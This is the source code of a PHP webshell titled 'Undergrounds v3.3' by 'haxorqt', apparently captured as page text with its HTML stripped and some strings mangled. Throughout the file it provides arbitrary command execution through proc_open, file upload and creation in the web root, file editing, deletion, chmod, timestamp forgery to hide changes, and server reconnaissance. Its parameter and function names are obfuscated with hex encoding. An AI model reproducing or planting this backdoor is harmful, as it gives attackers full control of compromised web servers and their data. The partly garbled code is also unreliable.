.::Undergrounds v3.3 Webshells::.

AMAN"; } else { $disf = "".$disfunc.""; } function author() { echo "

2017 © haxorqt \| Haxorqt team

"; exit(); } function cekdir() { if (isset($_GET['path'])) { $serlok = $_GET['path']; } else { $serlok = getcwd(); } if (is_writable($serlok)) { return "Aman Coy"; } else { return "KONTOL!"; } } function cekroot() { if (is_writable($_SERVER['DOCUMENT_ROOT'])) { return "Aman Coy"; } else { return "KONTOL!"; } } function haxorqt_ex($file) { $pile = $file; $pch = pathinfo($pile, PATHINFO_FILENAME); return $pch; } function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir.'/'.$item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } function net($hexnet) { for ($i = 0; $i < strlen($hexnet); $i++) { $haxorqt .= dechex(ord($hexnet[$i])); } return $haxorqt; } function owner($file) { if (function_exists("posix_getpwuid")) { $tod = @posix_getpwuid(fileowner($file)); return "".$tod['name'].""; } else { return "".fileowner($file).""; } } function cekwrite($serlok) { $izin = substr(sprintf('%o', fileperms($serlok)), -4); if (is_writable($serlok)) { return "".$izin.""; } else { return "".$izin.""; } } function cmd($gas, $serlok) { $crot = $gas; $pr = "proc_open"; if (function_exists($pr)) { $tod = @proc_open($crot, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok); echo "".stream_get_contents($crottz[1])."
"; } else { echo ""; } } function ekse($coman, $serlok) { $ler = "2>&1"; if (!preg_match("/".$ler."/i", $coman)) { $coman = $coman." ".$ler; } $komen = $coman; $pr = "proc_open"; if (function_exists($pr)) { $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok); echo "

    ".htmlspecialchars(stream_get_contents($crottz[1]))."

"; } else { echo "proc_open function is disabled!!"; } } function ipserv() { if (empty($_SERVER['SERVER_ADDR'])) { return gethostbyname($_SERVER['SERVER_NAME']); if (empty(gethostbyname($_SERVER['SERVER_NAME']))) { return $_SERVER['SERVER_NAME']; } } else { return $_SERVER['SERVER_ADDR']; } } function cekfile($file) { return ''; } function filedate($file) { return date("F d Y g:i:s", filemtime($file)); } function fext($file) { $sub = "163x75" . "142x73" . "x74x72"; return $sub(strrchr($file,'.'),1); } function gazz($file) { $fbiasa = array("php","phtml","shtml","phar","php7","html","htm","inc","phps","txt","js","css","htaccess","bin","pl","py","sh","php58","PhP7","aspx","dll","ini"); $notf = array("jpeg","jpg","png","gif","ico","webp","mp3","m4A","flac","wav","wma","3gp","ogg","webm","mp4","exe"); $stl = "x73x74" . "162164" . "157154x6f" . "167x65162"; $ext=$stl(fext($file)); if ($file == 'error_log') { return " "; } elseif(in_array($ext,$fbiasa)) { return " "; } elseif(in_array($ext,$notf)) { return " "; } elseif($ext == 'zip') { return " "; } else { return " "; } } function unzip($file, $serlok) { if (!is_readable($file)) { red("

Cannot Unzip File / Unreadable File !

"); die(); } elseif (strpos(file_get_contents($file), "x50x4bx03x04") === false) { echo "

This isn't Zip File

"; die(); } $zip = new ZipArchive; $res = $zip -> open($file); if ($res == true) { $zip -> extractTo($serlok); $zip -> close(); echo ""; } else { echo "

Unzip File Successfully => ".basename($_POST['path'])." Extract to : ".$file."

Failed to Unzip File!!

"; } exit(); } foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value); } if(isset($_GET['path'])){ $serlok = $_GET['path']; $serlok2 = $_GET['path']; } else { $serlok = getcwd(); $serlok2 = getcwd(); } $serlok = str_replace('\','/',$serlok); $serloks = explode('/',$serlok); $serlokbos = @scandir($serlok); echo '
'; echo '

: '; foreach($serloks as $id => $lok){ if($lok == '' && $id == 0){ echo '/ '; continue; } if($lok == '') continue; echo ''.$lok.' / '; } echo '

'; if (isset($_REQUEST['logout'])) { session_start(); session_destroy(); echo ''; } if (isset($_GET['viewfile'])) { $files = basename($_GET['viewfile']); echo "

Filename : $files"; echo '

"; exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { if (is_dir($_POST['path'])) { xrmdir($_POST['path']); if (file_exists($_POST['path'])) { echo '

Failed to delete Directory

'; } else { echo '

Folder removed

'; } } elseif (is_file($_POST['path'])) { @unlink($_POST['path']); if (file_exists($_POST['path'])) { echo "

Failed to Delete File

"; } else { echo "

File removed ".basename($_POST['path'])."

"; } } exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { if (isset($_POST['gantin'])) { $namabaru = $_GET['path']."/".$_POST['newname']; if (@rename($_POST['path'], $namabaru) === true) { echo "

Change Name Success

"; if ($_POST['type'] == "file") { echo "

Filename : ".basename($_POST['newname'])."

"; } else { echo "

Folder : ".basename($_POST['newname'])." "; } echo ' '; if ($_POST['type'] == "file") { echo ''; } else { echo ''; } echo '

'; } else { echo "

FAILED TO CHANGE NAME

"; } } else { if ($_POST['type'] == "file") { echo "

Filename : ".basename($_POST['path'], $_GET['file'])."

"; } else { echo "

Folder : ".basename($_POST['path'])." "; } echo ' '; if ($_POST['type'] == "file") { echo ''; } else { echo ''; } echo '

'; } exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { if (isset($_POST['gasedit'])) { $edit = file_put_contents($_POST['path'], $_POST['src']); if ($edit == true) { echo "

File saved Successfully

"; } else { echo "

Can't save file/Permission Denied

"; } } echo "

Filename : ".basename($_POST['path'])." "; echo ' back '.htmlspecialchars(@file_get_contents($_POST['path'])).'

'; exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdatef") { $filedate = basename($_POST['path']); $tgl = date("F d Y g:i:s", filemtime($_POST['path'])); echo "

Ubah Tanggal Folder : $filedate $tgl

"; if (isset($_POST['change'])) { $tanggal = strtotime($_POST['tanggal']); if (@touch($_POST['path'], $tanggal) == true) { echo "

Changed Successfully!!

"; } else { echo "

Failed to change date!!

"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdate") { $filedate = basename($_POST['path']); $tgl = date("F d Y g:i:s", filemtime($_POST['path'])); echo "

Ubah Tanggal File : $filedate $tgl

"; if (isset($_POST['change'])) { $tanggal = strtotime($_POST['tanggal']); if (@touch($_POST['path'], $tanggal) == true) { echo "

Changed Successfully!!

"; } else { echo "

Failed to change date!!

"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmodf") { $files = basename($_POST['path']); $sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms'; echo "

Folder : $files (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")

"; if (isset($_POST['ganti'])) { $opet = @chmod($_POST['path'], octdec($_POST['mod1'])); if ($opet == true) { echo "

Changed Successfully!!

"; } else { echo "

Failed to change!!

"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmod") { $files = basename($_POST['path']); $sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms'; echo "

Filename : $files (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")

"; if (isset($_POST['ganti'])) { $opet = @chmod($_POST['path'], octdec($_POST['mod1'])); if ($opet == true) { echo "

Changed Successfully!!

"; } else { echo "

Failed to change!!

"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") { unzip($_POST['path'], $serlok); } elseif ($_REQUEST[net('upload')] == "opet") { echo "

UPLOAD FILES

"; if (isset($_POST['uplod'])) { if ($_POST['dirnya'] == "2") { $serlok = $_SERVER['DOCUMENT_ROOT']; } if (empty($_FILES['haxorqtfile']['name'])) { echo "

File not selected"; } else { $data = @file_put_contents($serlok."/".$_FILES['haxorqtfile']['name'], @file_get_contents($_FILES['haxorqtfile']['tmp_name'])); if (file_exists($serlok."/".$_FILES['haxorqtfile']['name'])) { $fl = $serlok."/".$_FILES['haxorqtfile']['name']; echo "

Uploaded => ".$_FILES['haxorqtfile']['name']." "; if (strpos($serlok, $_SERVER['DOCUMENT_ROOT']) !== false) { $lwb = str_replace($_SERVER['DOCUMENT_ROOT'], $web."/", $fl); echo "Link : Click here

"; } echo "
"; } else { echo "

There was an error uploading your file.

"; } } }exit(); } elseif ($_GET[net('cmd')] == "opet") { echo "

"; echo ' Command : '; if (isset($_POST['comandeks'])) { ekse($_POST['komen'], $serlok); } echo "

"; exit(); } elseif ($_REQUEST[net('about')] == "opet") { echo "

Priv shell uwu edition - haxorqt shell v3.3 - Created by haxorqt

"; exit(); } elseif ($_REQUEST[net('buatfile')] == "opet") { function createfile(){ $pat = $_GET['path']; $nama_file = $_POST['nama_file']; $isi_file = $_POST['isi_file']; $handle = fopen("$pat/$nama_file", 'w'); $files = $_GET['path']."/".$nama_file; $asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files); if (fwrite($handle, $isi_file)) { echo '

Created => '.$pat.'/'.$nama_file.' Link : Click here

'; } else { echo '

Failed to create file..!!

'; } } if(!isset($_POST['bikin'])) { echo "

"; } else { createfile(); }exit(); } elseif ($_GET[net('buatfolder')] == "opet") { function createDirectory() { if (empty($_POST['add'])) { echo '

Folder field is required [Create again]

'; } else { $add = $_POST["add"]; $haxorqt = mkdir($_GET['path']."/".$add); if ($haxorqt == true) { echo "

Created => ".$_GET['path']."/$add Click Here

"; } else { echo "

Failed to create folder : $add

"; } } } if (!isset($_POST['submit'])) { echo '

Create Folder Back

'; } else { createDirectory(); }exit(); } elseif ($_REQUEST[net('info')] == "opet") { echo "

"; echo "Server : ".$_SERVER['HTTP_HOST']." "; echo "Server IP : ".ipserv()." Your IP : ".$_SERVER['REMOTE_ADDR']." "; echo "Web Server : ".$_SERVER['SERVER_SOFTWARE']." "; echo "System : ".php_uname()." "; echo "User : ".@get_current_user()." ( ".@getmyuid().") "; echo "PHP Version : ".@phpversion()." => ".php_sapi_name()." "; echo "
Disable Function : ".$disf.""; echo "
"; echo " Orecle : "; if (function_exists('oci_connect')) { echo "ON"; } else { echo "OFF"; echo " \| SSH2 : "; } if (function_exists('ssh2_connect')) { echo "ON"; } else { echo "OFF"; echo " \| MySQL : "; } if (function_exists("mysql_connect")) { echo "ON"; } else { echo "OFF"; } echo " \| cURL : "; if (function_exists("curl_init")) { echo "ON"; } else { echo "OFF"; } echo " \| WGET : "; if (file_exists("/usr/bin/wget")) { echo "ON"; } else { echo "OFF"; } echo " \| Perl : "; if (file_exists("/usr/bin/perl")) { echo "ON"; } else { echo "OFF"; } echo " \| Python : "; if (file_exists("/usr/bin/python2")) { echo "ON"; } else { echo "OFF"; } $pkexec = (@shell_exec("pkexec --version")) ? "ON" : "OFF"; echo " \| PKEXEC : $pkexec "; echo "

"; exit(); } if (!is_readable($serlok)) { die("

This directory is unreadable :(

"); } echo ''; $scd = "163143"."141156144"."151162"; if(is_readable($serlok)){ $fetch=$scd($serlok); $serlokbos=array(); $filez=array(); foreach($fetch as $fols){ if($fols=='.'||$fols=='..'){ continue; } $haxorqts=$serlok.'/'.$fols; if(is_dir($haxorqts)){ array_push($serlokbos,$fols); }elseif(is_file($haxorqts)){ array_push($filez,$fols); } } } foreach($serlokbos as $dir){ echo ""; } foreach($filez as $file) { if(!is_file("$serlok/$file")) continue; $size = filesize("$serlok/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = ''.round($size/1024,2).' MB'; } else { $size = ''.$size.' KB'; } echo ""; } echo '

Name	Size	Last Modified	Owner	Permissions	Actions
".$dir."	Dir	".filedate($serlok."/".$dir)."	".owner($serlok."/".$dir)."	"; if(is_writable($serlok."/".$dir)) echo ''; elseif(!is_readable($serlok."/".$dir)) echo ''; echo statusnya($serlok."/".$dir); if(is_writable($serlok."/".$dir) \|\| !is_readable($serlok."/".$dir)) echo ''; echo "
".cekfile($serlok."/".$file)." $file	".$size."	".filedate($serlok."/".$file)."	".owner($serlok."/".$file)."	"; if(is_writable("$serlok/$file")) echo ''; elseif(!is_readable("$serlok/$file")) echo ''; echo statusnya("$serlok/$file"); if(is_writable("$serlok/$file") \|\| !is_readable("$serlok/$file")) echo ''; echo "	"; echo gazz($file); echo "

'; author(); function statusnya($file){ $izin = substr(sprintf('%o', fileperms($file)), -4); return $izin; } ?>

UPLOAD FILES

Create Folder